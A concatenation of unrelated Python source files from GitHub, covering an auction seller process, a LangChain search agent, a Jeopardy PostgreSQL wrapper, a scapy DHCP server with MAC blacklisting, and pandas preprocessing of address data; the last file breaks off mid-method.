super(Seller, self).__init__()
self.pid = os.getpid()
now = time.ctime(int(time.time()))
self.logger.info("(PID %s)-starting Seller, %s" %(str(self.pid),str(now)))
self.sellernum = str(sellernum)
self.bidamt = 0
self.assigned = ''
self.winner = ''
self.price = 0
self.active = False
self.pulse = 0
self.buyers = 3
self.assignedbuyers = {}
self.biddingbuyers = 0
def on_assignport(self):
# Receive bid
msg = self.assignport.recv_pyobj()
self.logger.info(str(msg))
if self.active == True:
msg = msg.split(',')
if not msg[0] == 'assigned':
self.biddingbuyers+= 1
obj = str(msg[0])
bidamt = float(msg[1])
buyernum = msg[2]
if obj == self.sellernum:
self.logger.info("Seller %s received bid %f from Buyer %s" % (self.sellernum, bidamt, buyernum))
if bidamt >= self.bidamt:
self.bidamt = float(msg[1])
self.winner = buyernum
else:
self.assignedbuyers[msg[1]] = msg[0]
self.logger.info('assigned = %d, bidding = %d' % (len(self.assignedbuyers), self.biddingbuyers))
if self.biddingbuyers + len(self.assignedbuyers) == self.buyers:
if len(self.assignedbuyers) < self.buyers:
self.assignment()
# def on_timeout(self):
# now = self.timeout.recv_pyobj()
# if self.active:
# self.pulse += 1
# if self.pulse == 4:
# self.active = False
# self.logger.info('finalizing bids for seller [PID: %s]' %(self.pid))
# if not self.assigned == '':
# freed = self.assigned
# else:
# freed = ''
# self.assigned = self.winner
# self.logger.info("seller %s temporarily assigned to buyer %s" % (self.sellernum, self.assigned))
# self.freebuyer.send_pyobj('assigned_'+self.assigned+'_'+self.sellernum)
# if not freed == '':
# self.freebuyer.send_pyobj('freed_'+freed)
# self.price += self.bidamt
# msg = self.sellernum+'_'+str(self.price)
# self.logger.info('seller %s sending new price' % self.sellernum)
# self.sendprice.send_pyobj(msg)
# self.active = True
# self.pulse = 0
def assignment(self):
# now = self.timeout.recv_pyobj()
self.logger.info('finalizing bids for seller [PID: %s]' %(self.pid))
self.price += self.bidamt
if not self.winner == '':
if not self.assigned == '':
freed = self.assigned
else:
freed = ''
self.assigned = self.winner
self.logger.info("seller %s temporarily assigned to buyer %s" % (self.sellernum, self.assigned))
self.freebuyer.send_pyobj('assigned_'+self.assigned+'_'+self.sellernum)
if not freed == '':
self.freebuyer.send_pyobj('freed_'+freed)
else:
msg = self.sellernum+'_'+str(self.price)
self.logger.info('seller %s sending new price' % self.sellernum)
self.assignedbuyers.clear()
self.biddingbuyers = 0
self.winner = ''
self.bidamt = 0
time.sleep(5)
self.sendprice.send_pyobj(msg)
def on_recvack(self):
resp = self.recvack.recv_pyobj()
if not self.winner == '':
msg = self.sellernum+'_'+str(self.price)
self.logger.info('seller %s sending new price' % self.sellernum)
self.assignedbuyers.clear()
self.biddingbuyers = 0
self.winner = ''
self.bidamt = 0
time.sleep(5)
self.sendprice.send_pyobj(msg)
def on_notify(self):
msg = self.notify.recv_pyobj()
if msg == 'start':
self.active = True
self.logger.info('starting negotiation round')
self.assignedbuyers.clear()
self.biddingbuyers = 0
self.winner = ''
self.bidamt = 0
msg = self.sellernum+'_'+str(self.price)
self.sendprice.send_pyobj(msg)
elif msg == 'stop':
self.active = False
self.logger.info('seller %s assigned to buyer %s' % (self.sellernum, self.assigned))
def __destroy__(self):
now = time.time()
self.logger.info("%s - stopping Seller, %s" %(str(self.pid),now)) | purboday/UGridAuction | ugrig_auction/Seller.py | Seller.py | py | 4,992 | python | en | code | 2 | github-code | 50 |
26240052838 | import langchain
from langchain import OpenAI, LLMChain, PromptTemplate, SerpAPIWrapper, LLMMathChain, GoogleSearchAPIWrapper
from langchain.memory import ConversationBufferMemory, ConversationSummaryMemory
from langchain.agents import load_tools, initialize_agent, Tool, AgentType
from langchain.callbacks import get_openai_callback
import streamlit as st
from config import LLM, CHAT_LLM
def main():
st.set_page_config(page_title="OpenAI Chat with SerpAI")
st.header("Ask a question 💬")
user_question = st.text_input("Input text here....")
# user_question = "杭州今日的天气。用中文回答"
if user_question:
llm_math_chain = LLMMathChain.from_llm(llm=LLM, verbose=True)
search = SerpAPIWrapper(params={
"engine": "google",
})
tools = [
Tool(
name="search",
func=search.run,
description="useful when you need to answer questions about current events. You should ask pointed questions"
),
Tool(
name="Calculator",
func=llm_math_chain.run,
description="useful when you need to answer math questions"
)
]
# tools.extend(load_tools(["llm-math"], llm=LLM))
agent = initialize_agent(
tools=tools,
llm=CHAT_LLM,
agent=AgentType.ZERO_SHOT_REACT_DESCRIPTION, # only one works
memory=ConversationSummaryMemory(memory_key="history", llm=LLM),
handle_parsing_errors=True,
verbose=True
)
# langchain.debug = True
print(agent.run('用中文回答: ' + user_question))
# langchain.debug = False
with get_openai_callback() as cb:
response = agent.run(user_question)
print(cb)
st.write(response)
main()
# template = """Assistant is a large language model trained by OpenAI.
# Assistant is designed to be able to assist with a wide range of tasks, from answering simple questions to providing in-depth explanations and discussions on a wide range of topics. As a language model, Assistant is able to generate human-like text based on the input it receives, allowing it to engage in natural-sounding conversations and provide responses that are coherent and relevant to the topic at hand.
# Assistant is constantly learning and improving, and its capabilities are constantly evolving. It is able to process and understand large amounts of text, and can use this knowledge to provide accurate and informative responses to a wide range of questions. Additionally, Assistant is able to generate its own text based on the input it receives, allowing it to engage in discussions and provide explanations and descriptions on a wide range of topics.
# Overall, Assistant is a powerful tool that can help with a wide range of tasks and provide valuable insights and information on a wide range of topics. Whether you need help with a specific question or just want to have a conversation about a particular topic, Assistant is here to assist.
# {history}
# Human: {human_input}
# Assistant:"""
# prompt = PromptTemplate(input_variables=["history", "human_input"], template=template)
# chat_chain = LLMChain(
# llm=OpenAI(temperature=0),
# prompt=prompt,
# verbose=True,
# memory=ConversationBufferMemory(memory_key="chat_history", input_key="input"),
# )
# output = chat_chain.predict(
# human_input="I want you to act as a Linux terminal. I will type commands and you will reply with what the terminal should show. I want you to only reply with the terminal output inside one unique code block, and nothing else. Do not write explanations. Do not type commands unless I instruct you to do so. When I need to tell you something in English I will do so by putting text inside curly brackets {like this}. My first command is pwd."
# )
# print(output)
| kpister/prompt-linter | data/scraping/repos/cfa532~chroma-langchain-tutorial/GPTClone.py | GPTClone.py | py | 3,951 | python | en | code | 0 | github-code | 50 |
36082321562 | import psycopg2
class DatabaseConnection:
def __init__(self, connect_args=None):
with open('password.txt') as f:
password = f.readline()
try:
if connect_args is None:
self.connection = psycopg2.connect('dbname=jeopardy user=luke password=' + password)
else:
self.connection = psycopg2.connect(connect_args)
self.connection.autocommit = True
self.cursor = self.connection.cursor()
except psycopg2.Error as e:
print("Error connecting to database" + '\n' + e.pgcode + '\n' + e.pgerror)
def close(self):
try:
self.cursor.close()
self.connection.close()
except psycopg2.Error as e:
print("Error closing the connection." + '\n' + e.pgcode + '\n' + e.pgerror)
def insert_parsed_game(self, episode_num, game_link):
print('Inserting game into parsed list')
self.cursor.execute('''
INSERT INTO parsed_games(episode_num, game_link)
VALUES (%s, %s);
''', (episode_num, game_link))
def insert_season(self, name, start_date, end_date, total_games):
print('Inserting season')
self.cursor.execute('''
INSERT INTO seasons (season_name, start_date, end_date, total_games)
VALUES (%s, %s, %s, %s);
''', (name, start_date, end_date, total_games))
def insert_contestant(self, name, notes, games_played, total_winnings):
print('Inserting contestant')
self.cursor.execute('''
INSERT INTO contestants (name, notes, games_played, total_winnings)
VALUES (%s, %s, %s, %s);
''', (name, notes, games_played, total_winnings))
def insert_game(self, episode_num, season_id, air_date, notes, contestant1, contestant2, contestant3,
winner, score1, score2, score3):
print(f'Inserting game {episode_num}')
self.cursor.execute('''
INSERT INTO
games (episode_num, season_id, air_date, notes, contestant1, contestant2, contestant3, winner, score1, score2, score3)
VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s);
''', (episode_num, season_id, air_date, notes, contestant1, contestant2, contestant3, winner,
score1, score2, score3))
def insert_question(self, game_id, value, daily_double, round, category, clue, response):
# print('Inserting clue')
self.cursor.execute('''
INSERT INTO clues (game_id, value, daily_double, round, category, clue, response)
VALUES (%s, %s, %s, %s, %s, %s, %s);
''', (game_id, value, daily_double, round, category, clue, response))
def print_seasons(self):
self.cursor.execute('SELECT * FROM seasons ORDER BY id;')
seasons = self.cursor.fetchall()
for season in seasons:
print(season)
def print_contestants(self):
self.cursor.execute('SELECT * FROM contestants ORDER BY id;')
contestants = self.cursor.fetchall()
for contestant in contestants:
print(contestant)
def print_games(self):
self.cursor.execute('SELECT * FROM games ORDER BY id;')
games = self.cursor.fetchall()
for game in games:
print(game)
def print_questions(self):
self.cursor.execute('SELECT * FROM clues ORDER BY id;')
questions = self.cursor.fetchall()
for question in questions:
print(question)
def game_parsed(self, episode_num):
self.cursor.execute('SELECT * FROM parsed_games WHERE episode_num=(%s)', (episode_num, ))
episode_num_found = len(self.cursor.fetchall()) > 0
return episode_num_found
def update_contestant(self, name, notes=None, games_played=None, total_winnings=None):
if games_played is not None:
self.cursor.execute('''
UPDATE contestants
SET games_played = (%s)
WHERE name = (%s);''', (games_played, name))
if notes is not None:
self.cursor.execute('''
UPDATE contestants
SET notes = (%s)
WHERE name = (%s);''', (notes, name))
if total_winnings is not None:
self.cursor.execute('''
UPDATE contestants
SET total_winnings = (%s)
WHERE name = (%s);''', (total_winnings, name))
def contestant_exists(self, name):
self.cursor.execute('''SELECT * FROM contestants WHERE name = (%s);''', (name,))
contestant = self.cursor.fetchone()
return contestant is not None
def get_contestant_games_played(self, name):
self.cursor.execute('''SELECT games_played FROM contestants WHERE name = (%s);''', (name,))
total_winnings = self.cursor.fetchone()
return total_winnings[0]
def get_contestant_winnings(self, name):
self.cursor.execute('''SELECT total_winnings FROM contestants WHERE name = (%s);''', (name,))
total_winnings = self.cursor.fetchone()
return total_winnings[0]
def get_contestant_id_from_name(self, name):
self.cursor.execute('''SELECT id FROM contestants WHERE name = (%s);''', (name,))
total_winnings = self.cursor.fetchone()
return total_winnings[0]
def get_game_from_episode_number(self, episode_number):
self.cursor.execute('''SELECT id FROM games WHERE episode_num = (%s);''', (episode_number,))
game_id = self.cursor.fetchone()
return game_id[0]
def setup_database(self):
# Parsed Games Table
self.cursor.execute('''
CREATE TABLE parsed_games (
id serial PRIMARY KEY,
episode_num integer,
game_link VARCHAR
);
''')
# Seasons Table
self.cursor.execute('''
CREATE TABLE seasons (
id serial PRIMARY KEY,
season_name VARCHAR(16),
start_date DATE,
end_date DATE,
total_games integer
);
''')
# Contestants Table
self.cursor.execute('''
CREATE TABLE contestants (
id serial PRIMARY KEY,
name VARCHAR NOT NULL,
notes VARCHAR,
games_played integer NOT NULL,
total_winnings integer
);
''')
# Games Table
self.cursor.execute('''
CREATE TABLE games (
id serial PRIMARY KEY,
episode_num INT UNIQUE,
season_id INT,
air_date DATE NOT NULL,
notes VARCHAR,
contestant1 INT,
contestant2 INT,
contestant3 INT,
winner INT,
score1 INT,
score2 INT,
score3 INT,
FOREIGN KEY (season_id) REFERENCES seasons (id),
FOREIGN KEY (contestant1) REFERENCES contestants (id),
FOREIGN KEY (contestant2) REFERENCES contestants (id),
FOREIGN KEY (contestant3) REFERENCES contestants (id),
FOREIGN KEY (winner) REFERENCES contestants (id)
);
''')
# Questions Table
self.cursor.execute('''
CREATE TABLE clues (
id serial PRIMARY KEY,
game_id INT,
value INT NOT NULL,
daily_double BOOLEAN NOT NULL,
round VARCHAR NOT NULL,
category VARCHAR NOT NULL,
clue VARCHAR NOT NULL,
response VARCHAR NOT NULL,
FOREIGN KEY (game_id) REFERENCES games (id)
);
''')
def delete_database(self):
self.cursor.execute('DROP TABLE games CASCADE')
self.cursor.execute('DROP TABLE seasons CASCADE')
self.cursor.execute('DROP TABLE contestants CASCADE')
self.cursor.execute('DROP TABLE clues CASCADE')
self.cursor.execute('DROP TABLE parsed_games')
| lukelavin/J-Archive-Parser | DatabaseConnection.py | DatabaseConnection.py | py | 7,785 | python | en | code | 0 | github-code | 50 |
40427726123 | import time
def CountFrequency(mylist):
#creating an empty dictionary
freq={}
for item in mylist:
if(item in freq):
freq[item] += 1
else:
freq[item] = 1
for key,value in freq.items():
print("%d : %d"%(key,value))
#driver funtion
if __name__ == "__main__":
start = time.time()
mylist = [1,1,1,5,5,5,6,6,6,7,8,11,8,5,7,9,10,16,12,3]
CountFrequency(mylist)
end = time.time()
print("Total time taken is",(end-start)*1000)
def CountFrequency(mylist):
freq = {}
for items in mylist:
freq[items] = mylist.count(items)
print(freq)
if __name__ == "__main__":
start = time.time()
mylist = [1,1,1,5,5,5,6,6,6,7,8,11,8,5,7,9,10,16,12,3]
CountFrequency(mylist)
end = time.time()
print("total time taken is",(end-start)*1000)
import numpy as np
start = time.time()
a = np.array = ([10,10,20,10,20,20,20,30,40,50,60,60,50,0])
unique_elements,count_elements = np.unique(a,return_counts = True)
print(np.asarray((unique_elements,count_elements)))
end = time.time()
print("Total time taken is",(end-start)*1000)
| ArnabBasak/PythonRepository | Python_Programs/frequenceCount.py | frequenceCount.py | py | 1,130 | python | en | code | 0 | github-code | 50 |
46722441828 | from socket import *
import binascii
from scapy.all import *
import json
import os
from ipaddress import *
import ser_fct
import datetime
serverPort = 67
serverSocket = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
#pour permettre la réutilisation d'adresse et le bind() sur des ports réservés
serverSocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
serverSocket.bind(('',serverPort))
list_mac=[]
count=0
c=0
while True:# le serveur écoute en boucle
with open('config.json','r+') as f:
config=json.load(f)
ser_fct.poolupdate(config['lease'])# rafraichir le pool régulièrement pour effacer les baux expirés.
print('The server is listening ...')
message, clientAddress = serverSocket.recvfrom(2048) #réception en brut
message=binascii.hexlify(message).decode('utf-8') #décode le message brut
message = str(message) #génère une chaine de hex
#print(message)
hwddr = ser_fct.raw_mac(bytes.fromhex(message[56:68])) #recupère l'@ MAC depuis le paquet brut recu
#print(hwddr)
raw_packet = binascii.unhexlify(message) # tranformer le string de hex en bytes
new_packet= BOOTP(raw_packet) # recevoir les bytes comme un trame avec une pdu DHCP près à l'utilisation par scapy
#print(new_packet)
#print("packet DHCP received. See details below : \n")
#new_packet.show() # pour afficher les champs détaillé du paquet
Ry_addr = ser_fct.get_option(new_packet[BOOTP].options, 'requested_addr')
#################################Parade aux attakcs#########################################
#Vérifier si l'addresse Mac qui envoie à notre serveur est autorisé
with open("Mac.json","r+") as f:
d=json.load(f)
lis=[s[:16] for s in d["autorised"]]
if (new_packet[BOOTP].chaddr.decode()not in lis):
continue;
#Vérifier si l'addresse Mac qui envoie à notre serveur est blacklisté
with open("blacklist.json","r+") as f:
d=json.load(f)
if new_packet[BOOTP].chaddr.decode() in d["blacklist"]:
continue;
if new_packet[DHCP].options[0][1]== 3:
count+=1
if count>=c:
c=count
if len(list_mac) ==0:
t=time.time()
list_mac.append(new_packet[BOOTP].chaddr.decode())
if (count>100 and (time.time()-t)<=6):
with open("blacklist.json","r+") as f:
d=json.load(f)
d['blacklist'].extend(list_mac)
f.seek(0)
d['blacklist']=list(dict.fromkeys(d['blacklist']))
json.dump(d,f,indent=4)
with open("attack_logs.txt","r+") as f:
f.write("Warning an attack was detected by @mac {} at {}".format(list(dict.fromkeys(list_mac)),datetime.datetime.now()))
elif (time.time()-t)>10:
t=time.time()
list_mac=[]
count=0
##########################Parade aux attacks###############################################################################
#On répond par offer ou ack selon le message reçu
if new_packet[DHCP].options[0][1]== 1 : #cas d'un discover
with open('config.json','r+') as f:
config=json.load(f)
Ry_addr = ser_fct.get_option(new_packet[DHCP].options, 'requested_addr') #chercher l'adresse requise par le discover
print(Ry_addr)
if Ry_addr != None: #si une adresse Ry_addr est requise
# vérifier que cette adresse peut être attribuée
print(ser_fct.ackornack(Ry_addr, config['network'], config['poolstart'], config['poolend']))
if ser_fct.ackornack(Ry_addr, config['network'], config['poolstart'], config['poolend']):
ser_fct.send_offer(new_packet,Ry_addr, config, hwddr) # envoyer un offer pour suggérer cette même adresse requise
else : # sinon si aucune adresse n'est requise on propose une nouvelle adresse depuis sélectionné à partir du pool
y_addr=ser_fct.selectadd(config['network'],config['poolstart'],config['poolend'])
ser_fct.send_offer(new_packet, y_addr, config, hwddr)
elif new_packet[DHCP].options[0][1]== 3 : #cas d'un dhcprequest
with open('config.json','r+') as f:
config=json.load(f)
# recupérer l'adresse requise dans le champ requested adresse
Ry_addr= ser_fct.get_option(new_packet[DHCP].options, 'requested_addr')
#vérifier que l'adresse est permise
if ser_fct.ackornack(Ry_addr, config['network'], config['poolstart'], config['poolend']):
ser_fct.send_ack(new_packet,config, hwddr) #accepter d'octroyer l'adresse
ser_fct.save2pool(Ry_addr, hwddr) # enregistrer cette adresse et l'ientifiant du client servi
else :
print("Aucune réponse n'est envoyée") #sinon si adresse non disponible, en suggérer une autre avec un dhcpoffer
pass #aucun ack ou nack n'est envoyé serveur revient en écoute
else :
pass
print(c)
| Arouiwassim/DHCP-Server | server.py | server.py | py | 5,263 | python | fr | code | 0 | github-code | 50 |
69812516317 | import dash
# external_stylesheets = ['https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css']
# meta_tags are required for the app layout to be mobile responsive
app = dash.Dash(
__name__,
suppress_callback_exceptions=True,
meta_tags=[
{"name": "viewport", "content": "width=device-width, initial-scale=1.0"}
],
)
server = app.server
app.title = "Find a pet-sitter nearby!"
app.server.static_folder = "static"
| Makoto1021/coco | app.py | app.py | py | 467 | python | en | code | 0 | github-code | 50 |
13883021239 | """
Created on Thu May 11 10:19:01 2017
@author: Viktor Andersson
"""
# This .py file is about loading a data frame with the help of Pandas, and then preprocess the data into a arbitrary format.
# TODO: Should save corresponding numbers to a file
# String compare
import csv
import os
from pathlib import Path
import pandas as pd # pandas is a dataframe library
import matplotlib.pyplot as plt # matplotlib.pyplot plots data
#import numpy as np # numpy provides N-dim object support
from sklearn.preprocessing import LabelEncoder # Needed for the dummy encoding
from sklearn.cross_validation import train_test_split # Used to split data into Training set and Test Set
class DataFrame:
def __init__(self, filePath, testSize):
self.df = self.LoadDataFrame(filePath)
# Training and Test set for Machine Learning
self.X_train = -1
self.X_test = -1
self.y_train = -1
self.y_test = -1
self.testSize = testSize
# Loads the Data Frame
def LoadDataFrame(self, filePath):
try:
return pd.read_csv(filePath)
except:
print("Invalid file name or File format, " + filePath)
# Prints the desired data frame rows
def PrintDataFrame(self, numRows):
if(numRows <= 0):
print(self.df.head())
print()
else:
print(self.df.head(numRows))
print()
# Prints the True/false Ration of the Data Frame
def TrueFalseRatio(self):
num_true = len(self.df.loc[self.df['Legitimate'] == True])
num_false = len(self.df.loc[self.df['Legitimate'] == False])
print("True/False Ratio:")
print("Number of True cases: {0} ({1:2.2f}%)".format(num_true, (num_true / (num_true + num_false)) * 100))
print("Number of False cases: {0} ({1:2.2f}%)".format(num_false, (num_false / (num_true + num_false)) * 100))
print()
def SanityCheck(self):
print("RowsxColumns: ", end = "")
print(self.df.shape)
print("NaN Values: ", end = "")
print(self.df.isnull().values.any())
# Print all NaN values
if(self.df.isnull().values.any()):
print(self.df[pd.isnull(self.df).any(axis=1)])
def Lookup(self, columnName, Value):
print(self.df.loc[self.df[columnName] == Value])
def GetIndex(self, columnName, Value):
return self.df.loc[self.df[columnName] == Value].index.get_values()
def SaveCSVFile(self, string):
self.df.to_csv(string + '.csv', index = False)
print('Saved file: ' + string + '.csv')
##################################################################
# Data Preprocessing #
##################################################################
# TODO: Find a more generic way of doing this. Word embedding? gensim?
def UpdateRegisters(self, dataFrame, columnName, axis, registerName = ''):
if registerName == '':
fileName = '1' + columnName + 'Register.csv'
else:
fileName = registerName
if Path(fileName).is_file():
print('File already exists. Added new information to old file.')
#print('File Removed.')
#os.remove(fileName)
else:
print('File 1' + columnName + 'Register.csv created.')
with open(fileName, 'w') as csvfile:
fieldnames = ['TempColumn']
#fieldnames = ['Name', 'SurName', 'Street', 'City']
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writeheader()
# Loads register csv
tempRegisterdf = pd.read_csv(fileName)
# Merge the desired Column with the desired register
if tempRegisterdf.columns[[0]] == 'TempColumn':
result = pd.concat([tempRegisterdf, dataFrame[columnName]], axis = axis, verify_integrity = True, copy = False)
# Drops the Temp Column
result.drop(tempRegisterdf.columns[[0]], axis = axis, inplace = True)
# Drops the last duplicate found
#result = result.drop_duplicates(result.columns.difference([columnName]))
#result.drop_duplicates(inplace = True)
#result = result.append(dataFrame[columnName])
# Drop NaN values
#result.dropna(inplace = True)
else:
#result = pd.merge(tempDf, dataFrame, on = 'Name')
#result = pd.concat([tempDf[columnName], dataFrame[columnName]], axis = 1, verify_integrity = True, copy = False)
# This is kinda bad, O(n) should be better performance
tempDf2 = dataFrame[columnName].drop_duplicates()
tempDf2.dropna(inplace = True)
values = list(tempDf2)
i = 0
while i < len(values):
s = pd.Series(values[i], index = [tempRegisterdf.columns[0]])
tempRegisterdf = tempRegisterdf.append(s, ignore_index = True)
i += 1
result = tempRegisterdf
result.drop_duplicates(inplace = True)
result.dropna(inplace = True)
result.to_csv(fileName, index = False)
print('Done: ' + fileName)
# Dummy encoding rather slow right now, can be made faster
def DummyEncode(self, dataFrame, columnNameInRegister, columnNameInDataFrame, registerName):
registerDataFrame = self.LoadDataFrame(registerName)
#print(registerName + ': ', end = "")
#print(len(registerDataFrame.index))
#columnNameTemp = []
# Loads the Register into a temp Array
#i = 0
#while i < maxIndexOfRegister:
# columnNameTemp.append(nameRegister[columnName][i])
# i += 1
# Replace the string with a corresponding Numerical representation
#i = 0
#self.df.loc[self.df[columnName] == Value].index.get_values()
#while i < maxIndexOfRegister:
# dataFrame.replace({nameRegister[columnName][i]: nameRegister[columnName][i].index.get_values()}, regex = True, inplace = True)
# i += 1
# O(n^2) this is kinda bad
columnToEncode = list(registerDataFrame[columnNameInRegister])
dict = {}
for index, feature in enumerate(columnToEncode):
#try:
if dataFrame[columnNameInDataFrame].str.contains(feature).any():
#dataFrame.replace({feature : index}, regex = True, inplace = True)
#dataFrame[feature] = registerDataFrame[feature]
dict[feature] = index
#else:
#print('Feature ' + feature + ' was not in the DataFrame.')
#except:
#continue
dataFrame[columnNameInDataFrame] = dataFrame[columnNameInDataFrame].map(dict)
print('Done Encoding: ' + columnNameInDataFrame)
# This function replaces all the strings in the data frame, to a corresponding number and saves unique names to Register.csv
# For handling Data Frames with letters if they are legit or not
def DataPreprocessingSortingOne(self, dataFrame):
# Create Data Frame
# Axis: 0 = Rows, 1 = Columns
print('\nNow: Updating Registers.')
self.UpdateRegisters(dataFrame, 'Name' , 1)
self.UpdateRegisters(dataFrame, 'SurName', 1)
self.UpdateRegisters(dataFrame, 'Street' , 1)
self.UpdateRegisters(dataFrame, 'City' , 1)
print('Done: Updating Registers.')
# Theses are the columns in the data frame, if a value is missing replace it.
# Note, the dummy encoding can not handle numerical values and strings in the same column
# Update Register
print('Now: Dummy Encoding')
self.DummyEncode(dataFrame, 'Name' , 'Name' , '1NameRegister.csv')
self.DummyEncode(dataFrame, 'SurName', 'SurName', '1SurNameRegister.csv')
self.DummyEncode(dataFrame, 'Street' , 'Street' , '1StreetRegister.csv')
self.DummyEncode(dataFrame, 'City' , 'City' , '1CityRegister.csv')
print('Done: Dummy Encoding.')
# Dummy encode
# Fills all the NaN aka missing values with -1
print('Now: Replacing Missing Values.')
dataFrame['Name'] = dataFrame['Name'].fillna(-1)
dataFrame['SurName'] = dataFrame['SurName'].fillna(-1)
dataFrame['Street'] = dataFrame['Street'].fillna(-1)
dataFrame['City'] = dataFrame['City'].fillna(-1)
dataFrame['StreetNr'] = dataFrame['StreetNr'].fillna(-1)
dataFrame['ZipCode'] = dataFrame['ZipCode'].fillna(-1)
print('Done: Replacing Missing Values.')
# Change True/False to 1/0
print('Now: Replacing True/False to 1/0.')
correctAdress = {True : 1, False : 0}
dataFrame['Legitimate'] = dataFrame['Legitimate'].map(correctAdress)
print('Done: Replacing True/False to 1/0.\n')
#==============================================================================
# dataFrame['Name'] = dataFrame['Name'].fillna('missing')
# dataFrame['SurName'] = dataFrame['SurName'].fillna('missing')
# dataFrame['Street'] = dataFrame['Street'].fillna('missing')
# dataFrame['StreetNr'] = dataFrame['StreetNr'].fillna(-1)
# dataFrame['ZipCode'] = dataFrame['ZipCode'].fillna(-1)
# dataFrame['City'] = dataFrame['City'].fillna('missing')
#
# # Chane True/False to 1/0
# correctAdress = {True : 1, False : 0}
# dataFrame['Legitimate'] = dataFrame['Legitimate'].map(correctAdress)
#
# # This part replaces all the Strings with a corresponding number
# columnsToEncode = list(dataFrame.select_dtypes(include=['category','object']))
# le = LabelEncoder()
# for feature in columnsToEncode:
# try:
# dataFrame[feature] = le.fit_transform(dataFrame[feature])
# except:
# print('Error encoding '+ feature)
# return dataFrame
#==============================================================================
# For handling Data Frames with letter sent
def DataPreprocessingSortingTwo(self, dataFrame):
# Create Data Frame
# Axis: 0 = Rows, 1 = Columns
print('\nNow: Updating Registers.')
# This is the Start position of the letters
self.UpdateRegisters(dataFrame, 'Name' , 1)
self.UpdateRegisters(dataFrame, 'SurName', 1)
self.UpdateRegisters(dataFrame, 'Street' , 1)
self.UpdateRegisters(dataFrame, 'City' , 1)
# This is the End position of the letters
self.UpdateRegisters(dataFrame, 'StartStreet', 1, '1StreetRegister.csv')
self.UpdateRegisters(dataFrame, 'EndStreet' , 1, '1StreetRegister.csv')
self.UpdateRegisters(dataFrame, 'StartCity' , 1, '1CityRegister.csv')
self.UpdateRegisters(dataFrame, 'EndCity' , 1, '1CityRegister.csv')
print('Done: Updating Registers.')
# Theses are the columns in the data frame, if a value is missing replace it.
# Note, the dummy encoding can not handle numerical values and strings in the same column
# Update Register
print('Now: Dummy Encoding')
self.DummyEncode(dataFrame, 'Name' , 'Name' , '1NameRegister.csv')
self.DummyEncode(dataFrame, 'SurName', 'SurName', '1SurNameRegister.csv')
self.DummyEncode(dataFrame, 'Street' , 'Street' , '1StreetRegister.csv')
self.DummyEncode(dataFrame, 'City' , 'City' , '1CityRegister.csv')
self.DummyEncode(dataFrame, 'Street', 'StartStreet', '1StreetRegister.csv')
self.DummyEncode(dataFrame, 'Street', 'EndStreet' , '1StreetRegister.csv')
self.DummyEncode(dataFrame, 'City' , 'StartCity' , '1CityRegister.csv')
self.DummyEncode(dataFrame, 'City' , 'EndCity' ,'1CityRegister.csv')
print('Done: Dummy Encoding.')
# Dummy encode
# Fills all the NaN aka missing values with -1
print('Now: Replacing Missing Values.')
dataFrame['Name'] = dataFrame['Name'].fillna(-1)
dataFrame['SurName'] = dataFrame['SurName'].fillna(-1)
dataFrame['Street'] = dataFrame['Street'].fillna(-1)
dataFrame['City'] = dataFrame['City'].fillna(-1)
dataFrame['StreetNr'] = dataFrame['StreetNr'].fillna(-1)
dataFrame['ZipCode'] = dataFrame['ZipCode'].fillna(-1)
dataFrame['StartStreet'] = dataFrame['StartStreet'].fillna(-1)
dataFrame['StartStreetNr'] = dataFrame['StartStreetNr'].fillna(-1)
dataFrame['StartZipCode'] = dataFrame['StartZipCode'].fillna(-1)
dataFrame['StartCity'] = dataFrame['StartCity'].fillna(-1)
dataFrame['EndStreet'] = dataFrame['EndStreet'].fillna(-1)
dataFrame['EndStreetNr'] = dataFrame['EndStreetNr'].fillna(-1)
dataFrame['EndZipCode'] = dataFrame['EndZipCode'].fillna(-1)
dataFrame['EndCity'] = dataFrame['EndCity'].fillna(-1)
print('Done: Replacing Missing Values.')
# Change True/False to 1/0
print('Now: Replacing True/False to 1/0.')
correctAdress = {True : 1, False : 0}
dataFrame['Legitimate'] = dataFrame['Legitimate'].map(correctAdress)
dataFrame['CorrectDelivery'] = dataFrame['CorrectDelivery'].map(correctAdress)
print('Done: Replacing True/False to 1/0.\n')
##################################################################
# Data Sets #
##################################################################
# To see if a letter is legitimate or not
def DataSplitOne(self):
feature_col_names = ['Name', 'SurName', 'City', 'Street', 'StreetNr', 'ZipCode']
prediction_class_name = ['Legitimate']
X = self.df[feature_col_names].values # predictor feature columnd (8 X m)
y = self.df[prediction_class_name].values # predicted calss (1 = true, 0 = false) column (1 X m)
self.X_train, self.X_test, self.y_train, self.y_test = train_test_split(X, y, test_size = self.testSize, random_state = 42) # 42 is the answer to everything
#Print to check if the split was to our liking
def DataSplitCheck(self):
print("Data Split:")
print("{0:0.2f}% in training set".format((len(self.X_train) / len(self.df.index)) * 100))
print("{0:0.2f}% in test set".format((len(self.X_test) / len(self.df.index)) * 100))
def DataSplitVerifying(self):
print("Original True : {0} ({1:0.2f}%)".format(len(self.df.loc[self.df['Legitimate'] == 1]), len(self.df.loc[self.df['Legitimate'] == 1]) / len(self.df.index) * 100))
print("Original False : {0} ({1:0.2f}%)".format(len(self.df.loc[self.df['Legitimate'] == 0]), len(self.df.loc[self.df['Legitimate'] == 0]) / len(self.df.index) * 100))
print()
print("Training True : {0} ({1:0.2f}%)".format(len(self.y_train[self.y_train[:] == 1]), len(self.y_train[self.y_train[:] == 1]) / len(self.y_train) * 100))
print("Training False : {0} ({1:0.2f}%)".format(len(self.y_train[self.y_train[:] == 0]), len(self.y_train[self.y_train[:] == 0]) / len(self.y_train) * 100))
print()
print("Test True : {0} ({1:0.2f}%)".format(len(self.y_test[self.y_test[:] == 1]), len(self.y_test[self.y_test[:] == 1]) / len(self.y_test) * 100))
print("Test False : {0} ({1:0.2f}%)".format(len(self.y_test[self.y_test[:] == 0]), len(self.y_test[self.y_test[:] == 0]) / len(self.y_test) * 100))
print()
def plot_corr(self, dataframe, size = 11):
# data frame correlation function
corr = dataframe.corr()
fig, ax = plt.subplots(figsize=(size, size))
# color code the rectangles by correlation value
ax.matshow(corr)
# draw x tick marks
plt.xticks(range(len(corr.columns)), corr.columns)
# draw y tick marks
plt.yticks(range(len(corr.columns)), corr.columns)
### TO SEE IF THE LETTER ARRIVED AT THE CORRECT ADDRESS OR NOT ###
def DataSplitTwo(self):
